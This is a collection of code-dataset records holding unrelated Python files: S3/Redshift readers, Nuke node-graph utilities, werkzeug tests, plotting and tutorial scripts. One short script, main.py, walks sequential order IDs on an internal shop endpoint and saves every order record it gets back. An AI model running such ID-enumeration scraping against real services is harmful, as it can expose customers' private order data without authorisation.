False\n\t\tself._buffer = b\"\"\n\n\tdef read_in_chunks(self, streaming_body):\n\t\tfor chunk in iter(lambda: streaming_body.read(65536), b\"\"):\n\t\t\tyield chunk\n\n\tdef streaming_gzip_decompress(self, streaming_body):\n\t\t# offset 32 to skip the header\n\t\tdec = zlib.decompressobj(32 + zlib.MAX_WBITS)\n\t\tfor chunk in self.read_in_chunks(streaming_body):\n\t\t\trv = dec.decompress(chunk)\n\t\t\tif rv:\n\t\t\t\tyield rv\n\n\tdef __iter__(self):\n\t\treturn self\n\n\tdef __next__(self):\n\t\tif not self._buffer or self._buffer.find(b\"\\n\") == -1:\n\t\t\tif not self.started:\n\t\t\t\tlogger.info(\"Starting: %s\" % self.name)\n\t\t\t\tself.started = True\n\t\t\tself._buffer += next(self.data, b\"\")\n\n\t\tif self._buffer:\n\t\t\tline, partition, remainder = self._buffer.partition(b\"\\n\")\n\t\t\tself._buffer = remainder\n\t\t\treturn line.decode(\"utf8\")\n\t\telse:\n\t\t\traise StopIteration()\n\n\nclass ZippedStreamingBodyReader(object):\n\tdef __init__(self, streaming_body, name):\n\t\tself.name = name\n\t\tself.streaming_body = streaming_body\n\t\tself._lines = collections.deque([])\n\n\tdef __iter__(self):\n\t\tlogger.info(\"Starting: %s\" % self.name)\n\t\tdata = gzip.decompress(self.streaming_body.read())\n\t\ttext = data.decode(\"utf8\")\n\t\tself._lines.extend(text.split(\"\\n\"))\n\t\treturn self\n\n\tdef __next__(self):\n\t\trow = self._lines.popleft()\n\t\tif row:\n\t\t\treturn row\n\t\telse:\n\t\t\traise StopIteration()\n\n\nclass S3ManifestCursor(object):\n\tdef __init__(self, params, manifest_key, as_of, fetch_size=10000):\n\t\tself.params = params\n\t\tself.s3 = self.params.catalogue.s3\n\t\tself.as_of = as_of\n\t\tself.bucket = params.catalogue.s3_unload_bucket\n\t\tself.manifest_key = manifest_key\n\t\tmanifest_object = self.s3.get_object(\n\t\t\tBucket=self.bucket,\n\t\t\tKey=manifest_key\n\t\t)\n\t\tself.manifest = json.loads(manifest_object[\"Body\"].read().decode(\"utf8\"))\n\t\tself.readers = []\n\n\t\tcolumn_converters = params.query.csv_column_converters()\n\t\tself.converters = list(column_converters.values())\n\t\tself.column_keys = list(column_converters.keys())\n\t\tfor k, v in enumerate(self.converters):\n\t\t\tif issubclass(v, datetime):\n\t\t\t\tself.converters[k] = lambda v: \\\n\t\t\t\t\tdatetime.strptime(v, \"%Y-%m-%d %H:%M:%S\").replace(tzinfo=pytz.UTC)\n\t\t\telif issubclass(v, date):\n\t\t\t\tself.converters[k] = lambda v: datetime.strptime(v, \"%Y-%m-%d\").date()\n\n\t\tself.start_ts = int(time.time())\n\n\t\t# We are using the following logic so that we can stream through\n\t\t# The results on S3 using a fixed amount of memory.\n\t\tfor entry in self.manifest[\"entries\"]:\n\t\t\ttokens = entry[\"url\"].split(\"/\")\n\t\t\tkey = \"/\".join(tokens[-4:])\n\t\t\tentry_object = self.s3.get_object(\n\t\t\t\tBucket=self.bucket,\n\t\t\t\tKey=key\n\t\t\t)\n\t\t\tr = ZippedStreamingBodyReader(entry_object[\"Body\"], key)\n\t\t\tself.readers.append(r)\n\n\t\tself.dict_reader = reader(chain.from_iterable(self.readers))\n\n\t\tself._fetch_size = fetch_size\n\t\tself._buffer = collections.deque([])\n\t\tself._buffer_fill_count = 0\n\n\tdef _fill_buffer(self):\n\t\tself._buffer_fill_count += 1\n\t\tlogger.info(\"Buffer Fill %i\" % self._buffer_fill_count)\n\t\tlogger.info(\"Elapsed Seconds: %i\" % int(time.time() - self.start_ts))\n\t\tmem = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss\n\t\tlogger.info(\"Memory Usage: %s MB\" % str(round(mem / 1024, 2)))\n\n\t\treader = self.dict_reader\n\t\tnext_line = next(reader, None)\n\t\tcurrent_buffer_size = 0\n\t\ttarget_size = self._fetch_size - 1\n\t\twhile next_line and current_buffer_size < target_size:\n\t\t\tself._buffer.append(next_line)\n\t\t\tcurrent_buffer_size += 1\n\t\t\tnext_line = next(reader, None)\n\n\t\tif next_line:\n\t\t\tself._buffer.append(next_line)\n\n\tdef __iter__(self):\n\t\treturn self\n\n\tdef _restore_types(self, next_result):\n\t\tresult = {}\n\t\tfor i, v in enumerate(next_result):\n\t\t\tk = self.column_keys[i]\n\t\t\tif v == \"_N_\":\n\t\t\t\tresult[k] = None\n\t\t\telse:\n\t\t\t\tresult[k] = self.converters[i](v)\n\n\t\treturn result\n\n\tdef __next__(self):\n\t\tif not self._buffer:\n\t\t\tself._fill_buffer()\n\n\t\tif self._buffer:\n\t\t\tnext_result = self._buffer.popleft()\n\t\t\t# Restore types so output is identical to sqlalchemy cursor\n\t\t\treturn self._restore_types(next_result)\n\t\telse:\n\t\t\traise StopIteration()\n","sub_path":"hsredshift/analytics/library/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":46571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"93270055","text":"class DistinctError(ValueError):\n \"\"\"如果向distinctdict添加重复值,则引发错误。\"\"\"\n\n\nclass distinctdict(dict):\n \"\"\"不接受重复值的字典\"\"\"\n\n def __setitem__(self, key, value):\n if value in self.values():\n if (\n (key in self and self[key] != value) or\n key not in self\n ):\n raise DistinctError(\"This value already exits for different key\")\n super().__setitem__(key, value)\n\n\nclass Folder(list):\n def __init__(self, name):\n self.name = name\n\n def dir(self, nesting=0):\n offset = \" \" * nesting\n print('%s%s/' % (offset, self.name))\n\n for element in self:\n if hasattr(element, 'dir'):\n element.dir(nesting + 1)\n else:\n print(\"%s %s\" % (offset, element))\n\n\n# 访问超类中的方法\nclass Mama:\n def says(self):\n print('do you homework')\n\n\nclass Sister(Mama):\n def says(self):\n Mama.says(self) # super().says()\n print('and clean you bedroom')\n","sub_path":"01.grammer/use_class.py","file_name":"use_class.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"405201992","text":"from os import system\n\ngit = 'git init'\npoetry = 'poetry install'\n\n\ndef try_except(command, message):\n try:\n print(f\"+ {command}\")\n system(command)\n except Exception as e:\n print(f\"{message}: {e}\")\n\n\ntry_except(git, 'git exception')\ntry_except(poetry, 'poetry exception')\n","sub_path":"hooks/post_gen_project.py","file_name":"post_gen_project.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"502049364","text":"# Measuring leaf growth on newborn oak trees\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\n# Fonts:\ncsfont = {'fontname':'Charter', 'fontweight':'regular'}\nhfont = {'fontname':'Charter', 'fontweight':'bold'}\nifont = {'fontname':'Charter', 'fontweight':'regular', 'style':'italic'}\n\n# Colours:\nplant1Colour = '#18990c'\nplant2Colour = '#62b539'\nplant3Colour = '#93c75e'\n\nplant4Colour = '#67aeff'\nplant5Colour = '#3192ff'\nplant6Colour = '#0078ff'\n\ntextColour = '#818a8b'\n\ninterpColour = '#db2727'\n\nfont_axes = 12\nfont_labels = 22\nfont_title = 18\nfont_text = 14\n\n# Time:\nn_days = 21\ntime = range(1, n_days)\n\n# Leaf length in centimeters:\nl1p1e = np.array([4.4, 5.8, 6.8, 7.9, 8.7, 9.4, 9.6, 9.6, 9.6, 9.6, 9.6, 9.6, 9.6, 9.6, 9.6, 9.6, 9.6, 9.6, 9.6, 9.6])\nl1p2e = np.array([1.4, 2.1, 2.6, 3.6, 4.7, 6.0, 7.0, 8.1, 9.1, 9.8, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10])\nl2p2e = np.array([2.5, 3.0, 3.4, 3.8, 4.0, 4.1, 4.1, 4.1, 4.1, 4.1, 4.1, 4.1, 4.1, 4.1, 4.1, 4.1, 4.1, 4.1, 4.1, 4.1])\nl1p3e = np.array([3.8, 5.6, 6.7, 7.9, 9.1, 10.0, 10.3, 10.4, 10.4, 10.4, 10.4, 10.4, 10.4, 10.4, 10.4, 10.4, 10.4, 10.4, 10.4, 10.4])\n\nl1p1w = np.array([3.6, 4.2, 4.6, 5.2, 5.7, 6.0, 6.1, 6.1, 6.1, 6.1, 6.1, 6.1, 6.1, 6.1, 6.1, 6.1, 6.1, 6.1, 6.1, 6.1])\nl2p1w = np.array([2.0, 2.3, 2.7, 3.2, 4.0, 4.8, 5.0, 4.9, 6.0, 6.2, 6.3, 6.3, 6.4, 6.4, 6.4, 6.4, 6.4, 6.4, 6.4, 6.4])\nl3p1w = np.array([1.6, 1.8, 2.2, 2.7, 3.2, 4.1, 4.3, 5.5, 5.4, 5.7, 6.0, 6.1, 6.1, 6.1, 6.1, 6.1, 6.1, 6.1, 6.1, 6.1])\n\nl1p2w = np.array([4.2, 4.9, 5.3, 6.0, 6.7, 7.6, 8.0, 8.4, 8.5, 8.6, 8.7, 8.8, 8.9, 9.0, 9.1, 9.1, 9.1, 9.1, 9.1, 9.1])\nl2p2w = np.array([2.2, 2.5, 2.8, 3.3, 4.0, 4.8, 5.2, 5.7, 6.0, 6.3, 6.7, 7.0, 7.3, 7.3, 7.4, 7.4, 7.4, 7.4, 7.4, 7.4])\n\nl1p3w = np.array([2.1, 2.5, 2.8, 3.1, 3.4, 3.5, 3.5, 3.5, 3.5, 3.5, 3.5, 3.5, 3.5, 3.5, 3.5, 3.5, 3.5, 3.5, 3.5, 3.5])\nl2p3w = np.array([2.6, 3.2, 3.7, 4.5, 5.3, 6.3, 6.5, 7.0, 7.2, 7.2, 7.3, 7.3, 7.3, 7.3, 7.3, 7.3, 7.3, 7.3, 7.3, 7.3])\nl3p3w = np.array([1.2, 1.5, 2.0, 2.4, 3.0, 4.2, 4.4, 5.3, 6.2, 6.7, 7.1, 7.4, 7.4, 7.4, 7.4, 7.4, 7.4, 7.4, 7.4, 7.4])\n\n# Mark the results that were interpolated (missing measurements):\ninterp_meas = np.array([8.5, 8.6, 8.7, 8.8])\ninterp_time = np.array([9, 10, 11, 12])\n\n# Collect results to find the largest growth:\ncollected = np.array([l1p1e, l1p2e, l2p2e, l1p3e, l1p2w, l2p2w])\nn_leafs, n_meas = np.shape(collected)\n\nlargest_growth = 0\n\nfor i in range(0, n_leafs):\n\n for j in range(0, n_meas-1):\n\n if j != 0:\n growth = collected[i][j] - collected[i][j-1]\n\n if growth > largest_growth:\n largest_growth = growth\n start_length = collected[i][j-1]\n end_length = collected[i][j]\n\nprint('Largest growth observed: ' + str(largest_growth) + ' from ' + str(start_length) + 'cm to ' + str(end_length) + 'cm in one day.')\n\n# Plot graph:\nfigure = plt.figure(figsize=(6, 7))\nfigureSubplot = figure.add_subplot(1,1,1)\nplt.plot(time, l1p1e, color=plant1Colour, linestyle='-', linewidth=2.0)\nplt.plot(time, l1p2e, color=plant2Colour, linestyle='-', linewidth=2.0)\nplt.plot(time, l2p2e, color=plant2Colour, linestyle='-', linewidth=2.0)\nplt.plot(time, l1p3e, color=plant3Colour, linestyle='-', linewidth=2.0)\n\nplt.plot(time, l1p1w, color=plant4Colour, linestyle='-', linewidth=2.0)\nplt.plot(time, l2p1w, color=plant4Colour, linestyle='-', linewidth=2.0)\nplt.plot(time, l3p1w, color=plant4Colour, linestyle='-', linewidth=2.0)\n\nplt.plot(time, l1p2w, color=plant5Colour, linestyle='-', linewidth=2.0, zorder=0)\nplt.plot(time, l2p2w, color=plant5Colour, linestyle='-', linewidth=2.0)\n\nplt.plot(time, l1p3w, color=plant6Colour, linestyle='-', linewidth=2.0)\nplt.plot(time, l2p3w, color=plant6Colour, linestyle='-', linewidth=2.0)\nplt.plot(time, l3p3w, color=plant6Colour, linestyle='-', linewidth=2.0)\n\nplt.scatter(interp_time, interp_meas, color=interpColour, s=5, linewidth=2.0, zorder=1)\n\nplt.title(r'Leaf growth on newborn oak trees', fontsize=font_title, **hfont, color=textColour)\nplt.xlabel(r'Day', fontsize=font_labels, **csfont, color=textColour)\nplt.ylabel(r'Length in cm', fontsize=font_labels, **csfont, color=textColour)\n#plt.text(12, 4.3, 'secondary branch', **ifont, fontsize=font_text, color=plant2Colour)\nplt.text(20, 1.2, 'East orientation', **csfont, fontsize=font_text, color=plant1Colour, horizontalalignment='right')\nplt.text(20, 0.6, 'West orientation', **csfont, fontsize=font_text, color=plant6Colour, horizontalalignment='right')\nplt.text(16, 8, 'Missing measurements,\\nresults interpolated', **csfont, fontsize=font_text-6, color=interpColour, horizontalalignment='right')\nplt.xlim([0, time[-1] + 1]), plt.xticks(time)\nplt.ylim([0, 10]), plt.yticks(range(1, 12))\n\nfigureSubplot.spines['bottom'].set_color(textColour)\nfigureSubplot.spines['top'].set_color(textColour)\nfigureSubplot.spines['left'].set_color(textColour)\nfigureSubplot.spines['right'].set_color(textColour)\nfigureSubplot.tick_params(axis='x', colors=textColour)\nfigureSubplot.tick_params(axis='y', colors=textColour)\n\n# Set the tick labels font\nfor label in (figureSubplot.get_xticklabels()):\n label.set_fontname('Charter')\n label.set_fontweight('regular')\n label.set_fontsize(font_axes)\n\nfor label in (figureSubplot.get_yticklabels()):\n label.set_fontname('Charter')\n label.set_fontweight('regular')\n label.set_fontsize(font_axes)\n\n# Save plot:\nfilename = 'measuring-leaf-growth.png'\nplt.savefig(filename, dpi = 300, bbox_inches='tight')\n","sub_path":"measuring-leaf-growth/measuring-leaf-growth.py","file_name":"measuring-leaf-growth.py","file_ext":"py","file_size_in_byte":5470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"163889466","text":"import os\nfrom urllib.request import urlopen\nimport json\n\nfor i in range(999):\n html = 'http://www.eshop.unicom.local/eshop/front/order/orderInfo.do?id=' + str(i)\n response = urlopen(html).read()\n text = json.loads(response)\n print(i)\n name = './order/' + str(i) + '.txt'\n fopen = open(name, 'a')\n fopen.write(str(text))\n fopen.close()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"113880803","text":"# -------------------------------------------------------------------------- #\n# ---------------------------------------------------------------- HEADER -- #\n\"\"\"\n@copyright: 2018 Kludgeworks LLC\n\n@description: tools related to hierarchical relationships between nodes\n\n@author: Ed Whetstone\n\n@applications: NUKE\n\"\"\"\n\n# -------------------------------------------------------------------------- #\n# --------------------------------------------------------------- IMPORTS -- #\n# internal\nfrom vfx_utils.plutonium.core import decorators\n\n# domain\nimport nuke\n\n# -------------------------------------------------------------------------- #\n# ------------------------------------------------------------ DECORATORS -- #\ndef main_tree(func):\n \"\"\"decorates functions which take node arguments representing the\n main comp tree. Replaces nodes=None with a list of nuke Nodes.\"\"\"\n return decorators.defaults_factory('nodes', (main_comp, [], {}), func)\n\ndef full_tree(func):\n \"\"\"decorates functions which require all nodes connected to main\n tree, including those that don't contribute to the image, or are\n connected via expression links. Replaces nodes=None with a list\n of nuke Nodes.\"\"\"\n return decorators.defaults_factory('nodes', (full_comp, [], {}), func)\n\n# -------------------------------------------------------------------------- #\n# ------------------------------------------------------------- FUNCTIONS -- #\n\n# ------------------------------------------------ Input / Output Helpers -- #\n@decorators.selected_node\ndef direct_outputs(node=None, pipe=None):\n \"\"\"returns a list of nodes that node outputs to directly\n (not via expressions)\n \"\"\"\n depend_nodes = node.dependent(nuke.INPUTS)\n if not pipe:\n return [n for n in depend_nodes if n.Class() != 'Viewer']\n else:\n return [n for n in depend_nodes if n.Class() != 'Viewer'\n and n.input(pipe) == node]\n\n@decorators.selected_node\ndef direct_inputs(node=None):\n \"\"\"returns a list of nodes output to node directly\n (not via expressions)\"\"\"\n depend_nodes = node.dependencies(nuke.INPUTS)\n return [d for d in depend_nodes if d.Class() != 'Viewer']\n\n@decorators.selected_node\ndef exp_outputs(node=None):\n \"\"\"returns a list of nodes that node outputs through expressions\"\"\"\n depend_nodes = node.dependent(nuke.EXPRESSIONS)\n return [d for d in depend_nodes if d.Class() != 'Viewer']\n\n@decorators.selected_node\ndef exp_inputs(node=None):\n \"\"\"returns a list of nodes that this node recieves information from\n through expressions\"\"\"\n depend_nodes = node.dependencies(nuke.EXPRESSIONS)\n return depend_nodes\n\n# --------------------------------------------------------- Above / Below -- #\n@decorators.selected_nodes\ndef up(nodes=None, pipe=None):\n \"\"\"returns a list of nodes one level up from the given node(s)\"\"\"\n try:\n list(nodes)\n except:\n nodes = [nodes]\n if not pipe:\n return [in_node for n in nodes for in_node in direct_inputs(n)]\n else:\n return [n.input(pipe) for n in nodes if n.input(pipe)]\n\n@decorators.selected_nodes\ndef down(nodes=None, pipe=None):\n \"\"\"returns a list of nodes one level down from the given node(s)\"\"\"\n try:\n list(nodes)\n except:\n nodes = [nodes]\n return [out_node for n in list(nodes)\n for out_node in list(direct_outputs(n, pipe=pipe))]\n\n@decorators.selected_nodes\ndef above(nodes=None, dist_return=False, pipe=None):\n \"\"\"returns a list of all nodes that are up-chain from the\n given node(s)\"\"\"\n try:\n list(nodes)\n except TypeError:\n nodes = [nodes]\n above_nodes = []\n distances = []\n dist = 0\n while len(nodes) > 0:\n new_nodes = up(nodes, pipe=pipe)\n dist += 1\n new = filter(lambda a: a not in above_nodes, new_nodes)\n if len(new) == 0:\n break\n for n in new:\n if n not in above_nodes:\n above_nodes.append(n)\n distances.append(dist)\n nodes = new\n if dist_return:\n above_nodes = zip(above_nodes, distances)\n return above_nodes\n\n@decorators.selected_nodes\ndef below(nodes=None, dist_return=False, pipe=None):\n \"\"\"returns a list of all nodes that are up-chain from the\n given node(s)\"\"\"\n try:\n list(nodes)\n except:\n nodes = [nodes]\n below_nodes = []\n distances = []\n dist = 0\n while len(nodes) > 0:\n new_nodes = down(nodes, pipe=pipe)\n new = filter(lambda a: a not in below_nodes, new_nodes)\n if len(new) == 0:\n break\n for n in new:\n if n not in below_nodes:\n below_nodes.append(n)\n distances.append(dist)\n nodes = new\n dist += 1\n if dist_return:\n below_nodes = zip(below_nodes, distances)\n return below_nodes\n\n# ------------------------------------------------- Hierarchical Distance -- #\n# TODO: this section needs updating\ndef first_common_descent(nodes=None, pipe=None):\n \"\"\"returns the first down-chain node common to the given nodes\n (NOT IMPLEMENTED!)\n \"\"\"\n nodes = nodes if nodes else nuke.selectedNodes()\n node_lists = [below(n, pipe=pipe) for n in nodes]\n if len(node_lists) > 1:\n int_set = set(node_lists[0])\n for nl in node_lists[1:]:\n int_set.intersection_update(nl)\n tup_list = [(len(above(n, pipe=pipe)), n) for n in int_set]\n tup_list.sort()\n if tup_list:\n return tup_list[0][1]\n else:\n return []\n else:\n return []\n\ndef dist_between(anode, bnode, pipe=None):\n \"\"\"returns the connected distance between two nodes\"\"\"\n a_node_above = above(anode, pipe=pipe)\n b_node_above = above(bnode, pipe=pipe)\n dist = None\n if anode in b_node_above:\n above_tups = above(bnode, dist_return=True, pipe=pipe)\n above_tups.sort(key=lambda x: x[1])\n for distTup in above_tups:\n if anode == distTup[0]:\n dist = distTup[1]\n elif bnode in a_node_above:\n above_tups = above(anode, dist_return=True, pipe=pipe)\n above_tups.sort(key=lambda x: x[1])\n for distTup in above(anode, dist_return=True, pipe=pipe):\n if bnode == distTup[0]:\n dist = distTup[1]\n else:\n common_desc = first_common_descent((anode, bnode))\n if common_desc:\n distA = dist_between(anode, common_desc, pipe=pipe)\n distB = dist_between(bnode, common_desc, pipe=pipe)\n dist = distA + distB\n else:\n dist = None\n return dist\n\ndef nodes_between(anode, bnode, pipe=None):\n \"\"\"returns the list of nodes connecting two nodes\n (NOT IMPLEMENTED!)\n \"\"\"\n a_node_above = above(anode, pipe=pipe)\n b_node_above = above(bnode, pipe=pipe)\n nodes_btwn = None\n if anode in b_node_above:\n nodes_btwn = list(set(below(anode, pipe=pipe)) & set(b_node_above))\n elif bnode in a_node_above:\n nodes_btwn = list(set(below(bnode, pipe=pipe)) & set(a_node_above))\n else:\n common_desc = first_common_descent((anode, bnode), pipe=pipe)\n if common_desc:\n nodes_a = nodes_between(anode, common_desc, pipe=pipe)\n nodes_b = nodes_between(bnode, common_desc, pipe=pipe)\n nodes_btwn = nodes_a.extend(nodes_b)\n return nodes_btwn\n else:\n nodes_btwn = None\n return nodes_btwn\n\n# ------------------------------------------------------- Script Specific -- #\ndef main_comp():\n \"\"\"returns a list of all nodes in the largest tree in the comp,\n assumed to be the main comp\"\"\"\n all_nodes = nuke.allNodes('Write')\n above_nodes = []\n above_nodes = [(above(n), n) for n in all_nodes]\n main_comp = max(above_nodes, key=lambda x: len(x[0]))\n main_comp_nodes = main_comp[0]\n main_comp_nodes.reverse()\n main_comp_nodes.append(main_comp[1])\n return main_comp_nodes\n\ndef full_comp():\n \"\"\"return all the nodes connected to the comp, even if they don't contribute\n to the final output.\"\"\"\n main_tree_nodes = main_comp()\n all_nodes_ = nuke.allNodes()\n culled_nodes = [n for n in all_nodes_ if n not in main_tree_nodes]\n non_comp_nodes = [n for n in culled_nodes\n if any((abv in main_tree_nodes)\n for abv in above(nodes=n))]\n for node in list(non_comp_nodes):\n non_comp_nodes.extend(above(node))\n return list(set(non_comp_nodes))\n\n# ------------------------------------------------------- Sorting Methods -- #\ndef sorted_hierarchy(nodes):\n \"\"\"sorts the given nodes by hierarchical order. Assumes all nodes\n are in the same chain\"\"\"\n def sorter(node):\n return len([n for n in above(node) if n in nodes])\n return sorted(nodes, key=sorter)\n\n# ------------------------------------------------------- Group Hierarchy -- #\ndef parent(node=None):\n return nuke.toNode('.'.join(node.fullName().split('.')[:-1])) or nuke.root()\n","sub_path":"plutonium/core/crawl.py","file_name":"crawl.py","file_ext":"py","file_size_in_byte":9005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"542401139","text":"from django.conf.urls import url\nfrom . import views\n\napp_name = \"courses_app\"\nurlpatterns = [\n url(r'^create_comment/(?P\\d+)$',views.create_comment),\n url(r'^courses/destroy/destroy_course/(?P\\d+)$', views.destroy_course),\n url(r'^destroy_course/(?P\\d+)$', views.destroy_course),\n url(r'^courses/destroy/(?P\\d+)$', views.destroy_course),\n url(r'^create$', views.create_course),\n url(r'^$', views.index)\n ]\n","sub_path":"apps/courses_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"519884420","text":"#COMP 363 Assignment 11\n#Thomas Walsh\n\ntargetWord = ''\ngivenWord = ''\ntargetIndex = 0\ngivenIndex = 0\nsolution = []\n\ndef dynamic():\n global targetWord\n global givenWord\n global targetIndex\n global givenIndex\n global solution\n #Sets up the solution list of lists\n for x in range(targetIndex + 1):\n #Makes the right number of lists\n tempy = []\n for y in range(givenIndex + 1):\n #Adds the right number of zeros\n tempy.append(0)\n solution.append(tempy)\n #Checks each letter in target word\n for targetNum in range(targetIndex + 1):\n #Checks every letter in given word\n for givenNum in range(givenIndex + 1):\n #given word is empty\n if givenNum == 0:\n solution[targetNum][givenNum] = targetNum\n #target word is empty\n elif targetNum == 0:\n solution[targetNum][givenNum] = givenNum\n #letters match\n elif targetWord[targetNum - 1] == givenWord[givenNum - 1]:\n solution[targetNum][givenNum] = solution[targetNum - 1][givenNum - 1]\n #letters don't match\n else:\n #Checks to see whats easiest replacement, insertion, or removal\n solution[targetNum][givenNum] = 1 + min(solution[targetNum - 1][givenNum - 1], solution[targetNum][givenNum - 1], solution[targetNum - 1][givenNum])\n \ndef main():\n global targetWord\n global givenWord\n global targetIndex\n global givenIndex\n global solution\n targetWord = 'loyola'\n givenWord = 'crayola'\n targetIndex = len(targetWord)\n givenIndex = len(givenWord)\n dynamic()\n print(solution[targetIndex][givenIndex])\n\nmain()\n","sub_path":"COMP363A11/WALSH_11.1B.py","file_name":"WALSH_11.1B.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"577342684","text":"class WorldNode:\n def __init__(self, name):\n self.name = name\n self.children = {}\n self.parent = None\n self.depth = 0\n self.text = \"\"\n\n @property\n def display_name(self):\n return self.name.strip(\"#\")\n\n def add_child(self, node):\n if node.name in self.children:\n print(\"{} already exists.\".format(node.name))\n self.children[node.name] = node\n node.parent = self\n node.depth = self.depth + 1","sub_path":"toolkits/md2xml/src/node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"167011755","text":"from werkzeug.contrib import fixers\nfrom werkzeug.datastructures import ResponseCacheControl\nfrom werkzeug.http import parse_cache_control_header\nfrom werkzeug.test import Client\nfrom werkzeug.test import create_environ\nfrom werkzeug.wrappers import Request\nfrom werkzeug.wrappers import Response\n\n\n@Request.application\ndef path_check_app(request):\n return Response(\n \"PATH_INFO: %s\\nSCRIPT_NAME: %s\"\n % (request.environ.get(\"PATH_INFO\", \"\"), request.environ.get(\"SCRIPT_NAME\", \"\"))\n )\n\n\nclass TestServerFixer(object):\n def test_cgi_root_fix(self):\n app = fixers.CGIRootFix(path_check_app)\n response = Response.from_app(\n app, dict(create_environ(), SCRIPT_NAME=\"/foo\", PATH_INFO=\"/bar\")\n )\n assert response.get_data() == b\"PATH_INFO: /bar\\nSCRIPT_NAME: \"\n\n def test_cgi_root_fix_custom_app_root(self):\n app = fixers.CGIRootFix(path_check_app, app_root=\"/baz/\")\n response = Response.from_app(\n app, dict(create_environ(), SCRIPT_NAME=\"/foo\", PATH_INFO=\"/bar\")\n )\n assert response.get_data() == b\"PATH_INFO: /bar\\nSCRIPT_NAME: baz\"\n\n def test_path_info_from_request_uri_fix(self):\n app = fixers.PathInfoFromRequestUriFix(path_check_app)\n for key in \"REQUEST_URI\", \"REQUEST_URL\", \"UNENCODED_URL\":\n env = dict(create_environ(), SCRIPT_NAME=\"/test\", PATH_INFO=\"/?????\")\n env[key] = \"/test/foo%25bar?drop=this\"\n response = Response.from_app(app, env)\n assert response.get_data() == b\"PATH_INFO: /foo%bar\\nSCRIPT_NAME: /test\"\n\n def test_header_rewriter_fix(self):\n @Request.application\n def application(request):\n return Response(\"\", headers=[(\"X-Foo\", \"bar\")])\n\n application = fixers.HeaderRewriterFix(\n application, (\"X-Foo\",), ((\"X-Bar\", \"42\"),)\n )\n response = Response.from_app(application, create_environ())\n assert response.headers[\"Content-Type\"] == \"text/plain; charset=utf-8\"\n assert \"X-Foo\" not in response.headers\n assert response.headers[\"X-Bar\"] == \"42\"\n\n\nclass TestBrowserFixer(object):\n def test_ie_fixes(self):\n @fixers.InternetExplorerFix\n @Request.application\n def application(request):\n response = Response(\"binary data here\", mimetype=\"application/vnd.ms-excel\")\n response.headers[\"Vary\"] = \"Cookie\"\n response.headers[\"Content-Disposition\"] = \"attachment; filename=foo.xls\"\n return response\n\n c = Client(application, Response)\n response = c.get(\n \"/\",\n headers=[\n (\"User-Agent\", \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)\")\n ],\n )\n\n # IE gets no vary\n assert response.get_data() == b\"binary data here\"\n assert \"vary\" not in response.headers\n assert response.headers[\"content-disposition\"] == \"attachment; filename=foo.xls\"\n assert response.headers[\"content-type\"] == \"application/vnd.ms-excel\"\n\n # other browsers do\n c = Client(application, Response)\n response = c.get(\"/\")\n assert response.get_data() == b\"binary data here\"\n assert \"vary\" in response.headers\n\n cc = ResponseCacheControl()\n cc.no_cache = True\n\n @fixers.InternetExplorerFix\n @Request.application\n def application(request):\n response = Response(\"binary data here\", mimetype=\"application/vnd.ms-excel\")\n response.headers[\"Pragma\"] = \", \".join(pragma)\n response.headers[\"Cache-Control\"] = cc.to_header()\n response.headers[\"Content-Disposition\"] = \"attachment; filename=foo.xls\"\n return response\n\n # IE has no pragma or cache control\n pragma = (\"no-cache\",)\n c = Client(application, Response)\n response = c.get(\n \"/\",\n headers=[\n (\"User-Agent\", \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)\")\n ],\n )\n assert response.get_data() == b\"binary data here\"\n assert \"pragma\" not in response.headers\n assert \"cache-control\" not in response.headers\n assert response.headers[\"content-disposition\"] == \"attachment; filename=foo.xls\"\n\n # IE has simplified pragma\n pragma = (\"no-cache\", \"x-foo\")\n cc.proxy_revalidate = True\n response = c.get(\n \"/\",\n headers=[\n (\"User-Agent\", \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)\")\n ],\n )\n assert response.get_data() == b\"binary data here\"\n assert response.headers[\"pragma\"] == \"x-foo\"\n assert response.headers[\"cache-control\"] == \"proxy-revalidate\"\n assert response.headers[\"content-disposition\"] == \"attachment; filename=foo.xls\"\n\n # regular browsers get everything\n response = c.get(\"/\")\n assert response.get_data() == b\"binary data here\"\n assert response.headers[\"pragma\"] == \"no-cache, x-foo\"\n cc = parse_cache_control_header(\n response.headers[\"cache-control\"], cls=ResponseCacheControl\n )\n assert cc.no_cache\n assert cc.proxy_revalidate\n assert response.headers[\"content-disposition\"] == \"attachment; filename=foo.xls\"\n","sub_path":"tests/contrib/test_fixers.py","file_name":"test_fixers.py","file_ext":"py","file_size_in_byte":5291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"589303521","text":"# _*_ coding:utf-8 _*_\nfrom PIL import Image, ImageSequence\n\nimgname = 'C:\\工作\\gif动图逆序播放\\科比投篮动图.'\nim = Image.open(imgname + '.gif')\n# 初始化列表\nsequence = []\n#在图像序列中遍历所有帧\ni= 1\nfor f in ImageSequence.Iterator(im):\n sequence.append(f.copy())\n f.save(imgname + '分解'+ str(i) + '.png')#文件名需要有后缀,知道什么格式\n i += 1\n# 